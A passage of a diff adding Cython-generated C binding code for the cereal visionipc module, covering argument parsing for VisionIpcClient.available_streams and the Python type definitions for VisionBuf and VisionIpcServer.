PyObject **__pyx_pyargnames[] = {&__pyx_n_s_name,&__pyx_n_s_block,0}; + PyObject* values[2] = {0,0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); + CYTHON_FALLTHROUGH; + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_name)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 163, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + CYTHON_FALLTHROUGH; + case 1: + if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_block)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 163, __pyx_L3_error) + else { + __Pyx_RaiseArgtupleInvalid("available_streams", 1, 2, 2, 1); __PYX_ERR(0, 163, __pyx_L3_error) + } + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "available_streams") < 0)) __PYX_ERR(0, 163, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 2)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); + } + __pyx_v_name = __pyx_convert_string_from_py_std__in_string(values[0]); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 164, __pyx_L3_error) + __pyx_v_block = __Pyx_PyObject_IsTrue(values[1]); if (unlikely((__pyx_v_block == ((bool)-1)) && PyErr_Occurred())) __PYX_ERR(0, 164, __pyx_L3_error) + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("available_streams", 1, 2, 2, __pyx_nargs); __PYX_ERR(0, 163, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("cereal.visionipc.visionipc_pyx.VisionIpcClient.available_streams", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_10available_streams(__PYX_STD_MOVE_IF_SUPPORTED(__pyx_v_name), __pyx_v_block); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_10available_streams(std::string __pyx_v_name, bool __pyx_v_block) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("available_streams", 0); + + /* "cereal/visionipc/visionipc_pyx.pyx":165 + * @staticmethod + * def available_streams(string name, bool block): + * return cppVisionIpcClient.getAvailableStreams(name, block) # <<<<<<<<<<<<<< + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = __pyx_convert_set_to_py_enum__VisionStreamType(VisionIpcClient::getAvailableStreams(__pyx_v_name, __pyx_v_block)); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 165, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "cereal/visionipc/visionipc_pyx.pyx":163 + * return self.client.is_connected() + * + * @staticmethod # <<<<<<<<<<<<<< + * def available_streams(string name, bool block): + * return cppVisionIpcClient.getAvailableStreams(name, block) + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("cereal.visionipc.visionipc_pyx.VisionIpcClient.available_streams", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "(tree fragment)":1 + * def __reduce_cython__(self): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_13__reduce_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_13__reduce_cython__ = {"__reduce_cython__", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_13__reduce_cython__, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_13__reduce_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__reduce_cython__ (wrapper)", 0); + if (unlikely(__pyx_nargs > 0)) { + __Pyx_RaiseArgtupleInvalid("__reduce_cython__", 1, 0, 0, __pyx_nargs); return NULL;} + if (unlikely(__pyx_kwds) && __Pyx_NumKwargs_FASTCALL(__pyx_kwds) && unlikely(!__Pyx_CheckKeywordStrings(__pyx_kwds, "__reduce_cython__", 0))) return NULL; + __pyx_r = __pyx_pf_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_12__reduce_cython__(((struct __pyx_obj_6cereal_9visionipc_13visionipc_pyx_VisionIpcClient *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_12__reduce_cython__(CYTHON_UNUSED struct __pyx_obj_6cereal_9visionipc_13visionipc_pyx_VisionIpcClient *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__reduce_cython__", 0); + + /* "(tree fragment)":2 + * def __reduce_cython__(self): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" # <<<<<<<<<<<<<< + * def __setstate_cython__(self, __pyx_state): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + */ + __Pyx_Raise(__pyx_builtin_TypeError, __pyx_kp_s_no_default___reduce___due_to_non, 0, 0); + __PYX_ERR(1, 2, __pyx_L1_error) + + /* "(tree fragment)":1 + * def __reduce_cython__(self): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_AddTraceback("cereal.visionipc.visionipc_pyx.VisionIpcClient.__reduce_cython__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "(tree fragment)":3 + * def __reduce_cython__(self): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_15__setstate_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_15__setstate_cython__ = {"__setstate_cython__", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_15__setstate_cython__, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_15__setstate_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + CYTHON_UNUSED PyObject *__pyx_v___pyx_state = 0; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__setstate_cython__ (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_pyx_state,0}; + PyObject* values[1] = {0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pyx_state)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 3, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "__setstate_cython__") < 0)) __PYX_ERR(1, 3, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 1)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + } + __pyx_v___pyx_state = values[0]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("__setstate_cython__", 1, 1, 1, __pyx_nargs); __PYX_ERR(1, 3, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("cereal.visionipc.visionipc_pyx.VisionIpcClient.__setstate_cython__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_14__setstate_cython__(((struct __pyx_obj_6cereal_9visionipc_13visionipc_pyx_VisionIpcClient *)__pyx_v_self), __pyx_v___pyx_state); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_14__setstate_cython__(CYTHON_UNUSED struct __pyx_obj_6cereal_9visionipc_13visionipc_pyx_VisionIpcClient *__pyx_v_self, CYTHON_UNUSED PyObject *__pyx_v___pyx_state) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__setstate_cython__", 0); + + /* "(tree fragment)":4 + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" # <<<<<<<<<<<<<< + */ + __Pyx_Raise(__pyx_builtin_TypeError, __pyx_kp_s_no_default___reduce___due_to_non, 0, 0); + __PYX_ERR(1, 4, __pyx_L1_error) + + /* "(tree fragment)":3 + * def __reduce_cython__(self): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_AddTraceback("cereal.visionipc.visionipc_pyx.VisionIpcClient.__setstate_cython__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} +static struct __pyx_vtabstruct_6cereal_9visionipc_13visionipc_pyx_VisionBuf __pyx_vtable_6cereal_9visionipc_13visionipc_pyx_VisionBuf; + +static PyObject *__pyx_tp_new_6cereal_9visionipc_13visionipc_pyx_VisionBuf(PyTypeObject *t, CYTHON_UNUSED PyObject *a, CYTHON_UNUSED PyObject *k) { + struct __pyx_obj_6cereal_9visionipc_13visionipc_pyx_VisionBuf *p; + PyObject *o; + #if CYTHON_COMPILING_IN_LIMITED_API + allocfunc alloc_func = (allocfunc)PyType_GetSlot(t, Py_tp_alloc); + o = alloc_func(t, 0); + #else + if (likely(!__Pyx_PyType_HasFeature(t, Py_TPFLAGS_IS_ABSTRACT))) { + o = (*t->tp_alloc)(t, 0); + } else { + o = (PyObject *) PyBaseObject_Type.tp_new(t, __pyx_empty_tuple, 0); + } + if (unlikely(!o)) return 0; + #endif + p = ((struct __pyx_obj_6cereal_9visionipc_13visionipc_pyx_VisionBuf *)o); + p->__pyx_vtab = __pyx_vtabptr_6cereal_9visionipc_13visionipc_pyx_VisionBuf; + return o; +} + +static void __pyx_tp_dealloc_6cereal_9visionipc_13visionipc_pyx_VisionBuf(PyObject *o) { + #if CYTHON_USE_TP_FINALIZE + if (unlikely((PY_VERSION_HEX >= 0x03080000 || __Pyx_PyType_HasFeature(Py_TYPE(o), Py_TPFLAGS_HAVE_FINALIZE)) && __Pyx_PyObject_GetSlot(o, tp_finalize, destructor)) && (!PyType_IS_GC(Py_TYPE(o)) || !__Pyx_PyObject_GC_IsFinalized(o))) { + if (__Pyx_PyObject_GetSlot(o, tp_dealloc, destructor) == __pyx_tp_dealloc_6cereal_9visionipc_13visionipc_pyx_VisionBuf) { + if (PyObject_CallFinalizerFromDealloc(o)) return; + } + } + #endif + (*Py_TYPE(o)->tp_free)(o); +} + +static PyObject *__pyx_getprop_6cereal_9visionipc_13visionipc_pyx_9VisionBuf_data(PyObject *o, CYTHON_UNUSED void *x) { + return __pyx_pw_6cereal_9visionipc_13visionipc_pyx_9VisionBuf_4data_1__get__(o); +} + +static PyObject *__pyx_getprop_6cereal_9visionipc_13visionipc_pyx_9VisionBuf_width(PyObject *o, CYTHON_UNUSED void *x) { + return __pyx_pw_6cereal_9visionipc_13visionipc_pyx_9VisionBuf_5width_1__get__(o); +} + +static PyObject *__pyx_getprop_6cereal_9visionipc_13visionipc_pyx_9VisionBuf_height(PyObject *o, CYTHON_UNUSED void *x) { + return __pyx_pw_6cereal_9visionipc_13visionipc_pyx_9VisionBuf_6height_1__get__(o); +} + +static PyObject *__pyx_getprop_6cereal_9visionipc_13visionipc_pyx_9VisionBuf_stride(PyObject *o, CYTHON_UNUSED void *x) { + return __pyx_pw_6cereal_9visionipc_13visionipc_pyx_9VisionBuf_6stride_1__get__(o); +} + +static PyObject *__pyx_getprop_6cereal_9visionipc_13visionipc_pyx_9VisionBuf_uv_offset(PyObject *o, CYTHON_UNUSED void *x) { + return __pyx_pw_6cereal_9visionipc_13visionipc_pyx_9VisionBuf_9uv_offset_1__get__(o); +} + +static PyObject *__pyx_getprop_6cereal_9visionipc_13visionipc_pyx_9VisionBuf_rgb(PyObject *o, CYTHON_UNUSED void *x) { + return __pyx_pw_6cereal_9visionipc_13visionipc_pyx_9VisionBuf_3rgb_1__get__(o); +} + +static PyMethodDef __pyx_methods_6cereal_9visionipc_13visionipc_pyx_VisionBuf[] = { + {"__reduce_cython__", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6cereal_9visionipc_13visionipc_pyx_9VisionBuf_1__reduce_cython__, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {"__setstate_cython__", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6cereal_9visionipc_13visionipc_pyx_9VisionBuf_3__setstate_cython__, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {0, 0, 0, 0} +}; + +static struct PyGetSetDef __pyx_getsets_6cereal_9visionipc_13visionipc_pyx_VisionBuf[] = { + {(char *)"data", __pyx_getprop_6cereal_9visionipc_13visionipc_pyx_9VisionBuf_data, 0, (char *)0, 0}, + {(char *)"width", __pyx_getprop_6cereal_9visionipc_13visionipc_pyx_9VisionBuf_width, 0, (char *)0, 0}, + {(char *)"height", __pyx_getprop_6cereal_9visionipc_13visionipc_pyx_9VisionBuf_height, 0, (char *)0, 0}, + {(char *)"stride", __pyx_getprop_6cereal_9visionipc_13visionipc_pyx_9VisionBuf_stride, 0, (char *)0, 0}, + {(char *)"uv_offset", __pyx_getprop_6cereal_9visionipc_13visionipc_pyx_9VisionBuf_uv_offset, 0, (char *)0, 0}, + {(char *)"rgb", __pyx_getprop_6cereal_9visionipc_13visionipc_pyx_9VisionBuf_rgb, 0, (char *)0, 0}, + {0, 0, 0, 0, 0} +}; +#if CYTHON_USE_TYPE_SPECS +static PyType_Slot __pyx_type_6cereal_9visionipc_13visionipc_pyx_VisionBuf_slots[] = { + {Py_tp_dealloc, (void *)__pyx_tp_dealloc_6cereal_9visionipc_13visionipc_pyx_VisionBuf}, + {Py_tp_methods, (void *)__pyx_methods_6cereal_9visionipc_13visionipc_pyx_VisionBuf}, + {Py_tp_getset, (void *)__pyx_getsets_6cereal_9visionipc_13visionipc_pyx_VisionBuf}, + {Py_tp_new, (void *)__pyx_tp_new_6cereal_9visionipc_13visionipc_pyx_VisionBuf}, + {0, 0}, +}; +static PyType_Spec __pyx_type_6cereal_9visionipc_13visionipc_pyx_VisionBuf_spec = { + "cereal.visionipc.visionipc_pyx.VisionBuf", + sizeof(struct __pyx_obj_6cereal_9visionipc_13visionipc_pyx_VisionBuf), + 0, + Py_TPFLAGS_DEFAULT|Py_TPFLAGS_HAVE_VERSION_TAG|Py_TPFLAGS_CHECKTYPES|Py_TPFLAGS_HAVE_NEWBUFFER|Py_TPFLAGS_BASETYPE, + __pyx_type_6cereal_9visionipc_13visionipc_pyx_VisionBuf_slots, +}; +#else + +static PyTypeObject __pyx_type_6cereal_9visionipc_13visionipc_pyx_VisionBuf = { + PyVarObject_HEAD_INIT(0, 0) + "cereal.visionipc.visionipc_pyx.""VisionBuf", /*tp_name*/ + sizeof(struct __pyx_obj_6cereal_9visionipc_13visionipc_pyx_VisionBuf), /*tp_basicsize*/ + 0, /*tp_itemsize*/ + __pyx_tp_dealloc_6cereal_9visionipc_13visionipc_pyx_VisionBuf, /*tp_dealloc*/ + #if PY_VERSION_HEX < 0x030800b4 + 0, /*tp_print*/ + #endif + #if PY_VERSION_HEX >= 0x030800b4 + 0, /*tp_vectorcall_offset*/ + #endif + 0, /*tp_getattr*/ + 0, /*tp_setattr*/ + #if PY_MAJOR_VERSION < 3 + 0, /*tp_compare*/ + #endif + #if PY_MAJOR_VERSION >= 3 + 0, /*tp_as_async*/ + #endif + 0, /*tp_repr*/ + 0, /*tp_as_number*/ + 0, /*tp_as_sequence*/ + 0, /*tp_as_mapping*/ + 0, /*tp_hash*/ + 0, /*tp_call*/ + 0, /*tp_str*/ + 0, /*tp_getattro*/ + 0, /*tp_setattro*/ + 0, /*tp_as_buffer*/ + Py_TPFLAGS_DEFAULT|Py_TPFLAGS_HAVE_VERSION_TAG|Py_TPFLAGS_CHECKTYPES|Py_TPFLAGS_HAVE_NEWBUFFER|Py_TPFLAGS_BASETYPE, /*tp_flags*/ + 0, /*tp_doc*/ + 0, /*tp_traverse*/ + 0, /*tp_clear*/ + 0, /*tp_richcompare*/ + 0, /*tp_weaklistoffset*/ + 0, /*tp_iter*/ + 0, /*tp_iternext*/ + __pyx_methods_6cereal_9visionipc_13visionipc_pyx_VisionBuf, /*tp_methods*/ + 0, /*tp_members*/ + __pyx_getsets_6cereal_9visionipc_13visionipc_pyx_VisionBuf, /*tp_getset*/ + 0, /*tp_base*/ + 0, /*tp_dict*/ + 0, /*tp_descr_get*/ + 0, /*tp_descr_set*/ + #if !CYTHON_USE_TYPE_SPECS + 0, /*tp_dictoffset*/ + #endif + 0, /*tp_init*/ + 0, /*tp_alloc*/ + __pyx_tp_new_6cereal_9visionipc_13visionipc_pyx_VisionBuf, /*tp_new*/ + 0, /*tp_free*/ + 0, /*tp_is_gc*/ + 0, /*tp_bases*/ + 0, /*tp_mro*/ + 0, /*tp_cache*/ + 0, /*tp_subclasses*/ + 0, /*tp_weaklist*/ + 0, /*tp_del*/ + 0, /*tp_version_tag*/ + #if PY_VERSION_HEX >= 0x030400a1 + #if CYTHON_USE_TP_FINALIZE + 0, /*tp_finalize*/ + #else + NULL, /*tp_finalize*/ + #endif + #endif + #if PY_VERSION_HEX >= 0x030800b1 && (!CYTHON_COMPILING_IN_PYPY || PYPY_VERSION_NUM >= 0x07030800) + 0, /*tp_vectorcall*/ + #endif + #if __PYX_NEED_TP_PRINT_SLOT == 1 + 0, /*tp_print*/ + #endif + #if PY_VERSION_HEX >= 0x030C0000 + 0, /*tp_watched*/ + #endif + #if CYTHON_COMPILING_IN_PYPY && PY_VERSION_HEX >= 0x03090000 && PY_VERSION_HEX < 0x030a0000 + 0, /*tp_pypy_flags*/ + #endif +}; +#endif + +static PyObject *__pyx_tp_new_6cereal_9visionipc_13visionipc_pyx_VisionIpcServer(PyTypeObject *t, CYTHON_UNUSED PyObject *a, CYTHON_UNUSED PyObject *k) { + PyObject *o; + #if CYTHON_COMPILING_IN_LIMITED_API + allocfunc alloc_func = (allocfunc)PyType_GetSlot(t, Py_tp_alloc); + o = alloc_func(t, 0); + #else + if (likely(!__Pyx_PyType_HasFeature(t, Py_TPFLAGS_IS_ABSTRACT))) { + o = (*t->tp_alloc)(t, 0); + } else { + o = (PyObject *) PyBaseObject_Type.tp_new(t, __pyx_empty_tuple, 0); + } + if (unlikely(!o)) return 0; + #endif + return o; +} + +static void __pyx_tp_dealloc_6cereal_9visionipc_13visionipc_pyx_VisionIpcServer(PyObject *o) { + #if CYTHON_USE_TP_FINALIZE + if (unlikely((PY_VERSION_HEX >= 0x03080000 || __Pyx_PyType_HasFeature(Py_TYPE(o), Py_TPFLAGS_HAVE_FINALIZE)) && __Pyx_PyObject_GetSlot(o, tp_finalize, destructor)) && (!PyType_IS_GC(Py_TYPE(o)) || !__Pyx_PyObject_GC_IsFinalized(o))) { + if (__Pyx_PyObject_GetSlot(o, tp_dealloc, destructor) == __pyx_tp_dealloc_6cereal_9visionipc_13visionipc_pyx_VisionIpcServer) { + if (PyObject_CallFinalizerFromDealloc(o)) return; + } + } + #endif + { + PyObject *etype, *eval, *etb; + PyErr_Fetch(&etype, &eval, &etb); + __Pyx_SET_REFCNT(o, Py_REFCNT(o) + 1); + __pyx_pw_6cereal_9visionipc_13visionipc_pyx_15VisionIpcServer_11__dealloc__(o); + __Pyx_SET_REFCNT(o, Py_REFCNT(o) - 1); + PyErr_Restore(etype, eval, etb); + } + (*Py_TYPE(o)->tp_free)(o); +} + +static PyMethodDef __pyx_methods_6cereal_9visionipc_13visionipc_pyx_VisionIpcServer[] = { + {"create_buffers", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6cereal_9visionipc_13visionipc_pyx_15VisionIpcServer_3create_buffers, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {"create_buffers_with_sizes", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6cereal_9visionipc_13visionipc_pyx_15VisionIpcServer_5create_buffers_with_sizes, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {"send", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6cereal_9visionipc_13visionipc_pyx_15VisionIpcServer_7send, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {"start_listener", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6cereal_9visionipc_13visionipc_pyx_15VisionIpcServer_9start_listener, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {"__reduce_cython__", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6cereal_9visionipc_13visionipc_pyx_15VisionIpcServer_13__reduce_cython__, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {"__setstate_cython__", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6cereal_9visionipc_13visionipc_pyx_15VisionIpcServer_15__setstate_cython__, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {0, 0, 0, 0} +}; +#if CYTHON_USE_TYPE_SPECS +static PyType_Slot __pyx_type_6cereal_9visionipc_13visionipc_pyx_VisionIpcServer_slots[] = { + {Py_tp_dealloc, (void *)__pyx_tp_dealloc_6cereal_9visionipc_13visionipc_pyx_VisionIpcServer}, + {Py_tp_methods, (void *)__pyx_methods_6cereal_9visionipc_13visionipc_pyx_VisionIpcServer}, + {Py_tp_init, (void *)__pyx_pw_6cereal_9visionipc_13visionipc_pyx_15VisionIpcServer_1__init__}, + {Py_tp_new, (void *)__pyx_tp_new_6cereal_9visionipc_13visionipc_pyx_VisionIpcServer}, + {0, 0}, +}; +static PyType_Spec __pyx_type_6cereal_9visionipc_13visionipc_pyx_VisionIpcServer_spec = { + "cereal.visionipc.visionipc_pyx.VisionIpcServer", + sizeof(struct __pyx_obj_6cereal_9visionipc_13visionipc_pyx_VisionIpcServer), + 0, + Py_TPFLAGS_DEFAULT|Py_TPFLAGS_HAVE_VERSION_TAG|Py_TPFLAGS_CHECKTYPES|Py_TPFLAGS_HAVE_NEWBUFFER|Py_TPFLAGS_BASETYPE, + __pyx_type_6cereal_9visionipc_13visionipc_pyx_VisionIpcServer_slots, +}; +#else + +static PyTypeObject __pyx_type_6cereal_9visionipc_13visionipc_pyx_VisionIpcServer = { + PyVarObject_HEAD_INIT(0, 0) + "cereal.visionipc.visionipc_pyx.""VisionIpcServer", /*tp_name*/ + sizeof(struct __pyx_obj_6cereal_9visionipc_13visionipc_pyx_VisionIpcServer), /*tp_basicsize*/ + 0, /*tp_itemsize*/ + __pyx_tp_dealloc_6cereal_9visionipc_13visionipc_pyx_VisionIpcServer, /*tp_dealloc*/ + #if PY_VERSION_HEX < 0x030800b4 + 0, /*tp_print*/ + #endif + #if PY_VERSION_HEX >= 0x030800b4 + 0, /*tp_vectorcall_offset*/ + #endif + 0, /*tp_getattr*/ + 0, /*tp_setattr*/ + #if PY_MAJOR_VERSION < 3 + 0, /*tp_compare*/ + #endif + #if PY_MAJOR_VERSION >= 3 + 0, /*tp_as_async*/ + #endif + 0, /*tp_repr*/ + 0, /*tp_as_number*/ + 0, /*tp_as_sequence*/ + 0, /*tp_as_mapping*/ + 0, /*tp_hash*/ + 0, /*tp_call*/ + 0, /*tp_str*/ + 0, /*tp_getattro*/ + 0, /*tp_setattro*/ + 0, /*tp_as_buffer*/ + Py_TPFLAGS_DEFAULT|Py_TPFLAGS_HAVE_VERSION_TAG|Py_TPFLAGS_CHECKTYPES|Py_TPFLAGS_HAVE_NEWBUFFER|Py_TPFLAGS_BASETYPE, /*tp_flags*/ + 0, /*tp_doc*/ + 0, /*tp_traverse*/ + 0, /*tp_clear*/ + 0, /*tp_richcompare*/ + 0, /*tp_weaklistoffset*/ + 0, /*tp_iter*/ + 0, /*tp_iternext*/ + __pyx_methods_6cereal_9visionipc_13visionipc_pyx_VisionIpcServer, /*tp_methods*/ + 0, /*tp_members*/ + 0, /*tp_getset*/ + 0, /*tp_base*/ + 0, /*tp_dict*/ + 0, /*tp_descr_get*/ + 0, /*tp_descr_set*/ + #if !CYTHON_USE_TYPE_SPECS + 0, /*tp_dictoffset*/ + #endif + __pyx_pw_6cereal_9visionipc_13visionipc_pyx_15VisionIpcServer_1__init__, /*tp_init*/ + 0, /*tp_alloc*/ + __pyx_tp_new_6cereal_9visionipc_13visionipc_pyx_VisionIpcServer, /*tp_new*/ + 0, /*tp_free*/ + 0, /*tp_is_gc*/ + 0, /*tp_bases*/ + 0, /*tp_mro*/ + 0, /*tp_cache*/ + 0, /*tp_subclasses*/ + 0, /*tp_weaklist*/ + 0, /*tp_del*/ + 0, /*tp_version_tag*/ + #if 